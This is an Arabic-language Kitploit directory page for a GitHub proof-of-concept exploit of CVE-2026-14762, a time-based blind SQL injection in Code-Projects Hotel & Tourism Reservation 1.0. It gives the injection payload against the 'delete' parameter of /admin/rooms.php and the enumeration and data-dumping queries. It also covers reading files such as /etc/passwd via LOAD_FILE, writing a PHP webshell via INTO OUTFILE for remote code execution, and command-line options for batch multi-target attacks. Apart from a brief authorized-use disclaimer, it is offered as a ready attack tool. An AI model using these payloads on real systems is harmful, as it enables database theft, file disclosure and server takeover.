Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-14762-PoC-Exploit — استغلال حقن SQL أعمى قائم على الوقت متعدد الخيوط لثغرة CVE-2026-14762 يستهدف Hotel & Tourism Reservation 1.0. يعدّد قواعد البيانات والجداول والأعمدة؛ ويقرأ الملفات عبر LOAD_FILE؛ ويكتب قذائف ويب PHP لتحقيق RCE. يدعم البروكسي والفحص الدفعي وصدفة SQL تفاعلية. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-14762-poc-exploit
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
أمن قواعد البيانات
GitHubtc4dy/cve-2026-14762-poc-exploit

CVE-2026-14762-PoC-Exploit

استغلال حقن SQL أعمى قائم على الوقت متعدد الخيوط لثغرة CVE-2026-14762 يستهدف Hotel & Tourism Reservation 1.0. يعدّد قواعد البيانات والجداول والأعمدة؛ ويقرأ الملفات عبر LOAD_FILE؛ ويكتب قذائف ويب PHP لتحقيق RCE. يدعم البروكسي والفحص الدفعي وصدفة SQL تفاعلية.

عرض المستودع
212منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-14762 – استغلال حقن SQL في Code‑Projects Hotel &ourism Reservation 1.0

Python 3.11+ License CVSS CWE

أداة استغلال متكاملة ومتعددة الخيوط لحقن SQL الأعمى القائم على الوقت (Time‑based Blind SQL Injection) لثغرة CVE‑2026‑14762.
تستهدف نقطة النهاية /admin/rooms.php في تطبيق Code‑Projects Hotel & Tourism Reservation (الإصدار 1.0).
تحقق تعداداً كاملاً لقاعدة البيانات، وقراءة نظام الملفات عبر (LOAD_FILE)، وكتابة ملفات عشوائية عبر (INTO OUTFILE / DUMPFILE) – مما يؤدي إلى تنفيذ أوامر عن بُعد عبر نشر قشرة ويب (webshell).

استغلال CVE-2026-14762


🚀 الميزات


📦 المتطلبات

  • Python ≥ 3.11
  • حزم بايثون:
    • requests
    • urllib3
    • colorama (اختياري – لإخراج طرفية ملوّن)

ثبّت جميع التبعيات باستخدام:

root@kitploit:~
pip install requests urllib3 colorama

📖 الاستخدام

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-14762-PoC-Exploit.git

cd CVE-2026-14762-PoC-Exploit

chmod +x exploit.py or basic_exploit.py

📖 وسائط سطر الأوامر


⚙️ كيف يعمل

بناء الحمولة

يتم حقن المعامل delete بالشكل التالي:

root@kitploit:~
150' AND IF(<condition>, SLEEP(<delay>), 0) AND '1'='1

تقيّم الدالة IF() الشرط؛ إذا كان صحيحاً، يتوقف عمل قاعدة البيانات لمدة ثانية. استخراج الأحرف بالبحث الثنائي

لكل موضع حرف، يُحدَّد الحرف الصحيح عبر بحث ثنائي في نطاق ASCII (32–126) باستخدام مقارنات > و =. يقلل هذا من عدد الطلبات من 95 طلباً لكل حرف إلى نحو 7–8 طلبات، مما يجعل الاستخراج عالي الكفاءة. تعداد البيانات الوصفية

root@kitploit:~
اسم قاعدة البيانات: SELECT DATABASE()

الجداول: SELECT table_name FROM information_schema.tables WHERE table_schema='<db>' LIMIT n,1

الأعمدة: SELECT column_name FROM information_schema.columns WHERE table_schema='<db>' AND table_name='<table>' LIMIT n,1

تسريب البيانات

root@kitploit:~
SELECT <col> FROM <table> LIMIT row,1 – يستخرج البيانات صفاً بصف

يتم استخراج كل خلية حرفاً بحرف باستخدام تقنية البحث الثنائي نفسها

التفاعل مع نظام الملفات

root@kitploit:~
القراءة: LOAD_FILE('/path/to/file') – يتطلب أن تكون قيمة secure_file_priv فارغة أو أن تشير إلى الدليل المستهدف

الكتابة: SELECT '<content>' INTO OUTFILE '/path/to/shell.php' – يتطلب صلاحية FILE وألا تكون قيمة secure_file_priv مقيدة

🛡️ إخلاء المسؤولية

هذه الأداة مقدمة لأغراض اختبار الأمان المصرّح به والبحث التعليمي وتقييم الثغرات الأمنية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو أنشطة غير قانونية أو أضرار ناجمة عن هذا البرنامج. احصل دائماً على إذن كتابي صريح من مالك النظام قبل إجراء أي اختبار.

تنزيل الأداة
الفئةالإمكانية
الثغرةحقن SQL أعمى قائم على الوقت (CWE‑89)
ناقل الهجومGET /admin/rooms.php?delete=<payload>
الاستغلالحقن SLEEP() شرطي مع استخراج الأحرف عبر البحث الثنائي
قاعدة البياناتاستخراج اسم قاعدة البيانات الحالية
المخطط (Schema)تعداد الجداول والأعمدة عبر information_schema
تفريغ البياناتتصدير كامل للجدول (JSON) – عدد صفوف غير محدود مع حد قابل للضبط
قراءة الملفاتLOAD_FILE() – قراءة أي ملف يمكن لـ MySQL قراءته (مثل /etc/passwd وملفات الإعدادات)
كتابة الملفاتINTO OUTFILE / DUMPFILE – كتابة قشرة ويب PHP أو باب خلفي أو أي محتوى عشوائي
شل تفاعليشل SQL مباشر (استخراج قائم على الوقت) للاستعلامات اليدوية
استعلام واحدتنفيذ استعلام SQL مخصص واسترجاع النتائج (حد أقصى 512 حرفاً)
الوضع الدفعيفحص متعدد الأهداف مع تجمع خيوط قابل للضبط (ThreadPoolExecutor)
دعم الوكيلوكيل HTTP/HTTPS (Burp Suite وmitmproxy وغيرهما)
تسجيل مفصّلمخرجات ملوّنة مع معلومات تصحيح موقّتة زمنياً
صفر تبعياتفقط requests وurllib3 وcolorama (اختياري)
الوسيطالاختصارالنوعالافتراضيالوصف
--target-tURL—رابط هدف واحد (مثل http://192.168.1.100)
--target-file-lملف—ملف يحتوي على قائمة بالأهداف (هدف واحد في كل سطر)
--threads—عدد صحيح5عدد الخيوط للفحص متعدد الأهداف
--output-oمسار—ملف الإخراج (JSON للتفريغ ونص خام للملفات)
--verbose-vعلامةFalseتفعيل تسجيل التصحيح المفصّل
--proxy—URL—وكيل HTTP/HTTPS (مثل http://127.0.0.1:8080)
--user-agent-uaنصMozilla/5.0...ترويسة User-Agent مخصصة
--delay—عدد عشري5.0زمن الانتظار بالثواني للحقن الأعمى
--max-retries—عدد صحيح3الحد الأقصى لمحاولات إعادة الطلب
--ssl-verify—علامةFalseتفعيل التحقق من شهادة SSL
--webroot—مسار/var/www/htmlالجذر الوبائي لكتابة قشرة الويب عبر INTO OUTFILE
--dump-db—علامةFalseتفريغ جميع الجداول من قاعدة البيانات الحالية
--tables—علامةFalseعرض أسماء جميع الجداول فقط
--dump-table—جدول—تفريغ جدول محدد (مثل --dump-table users)
--read—مسار—قراءة ملف عبر LOAD_FILE()
--write-shell—علامةFalseكتابة قشرة ويب PHP (shell.php) إلى الجذر الوبائي
--sql—استعلام—تنفيذ استعلام SQL واحد (يُرجع 512 حرفاً كحد أقصى)
--interactive-iعلامةFalseتشغيل شل SQL تفاعلي بعد الاستغلال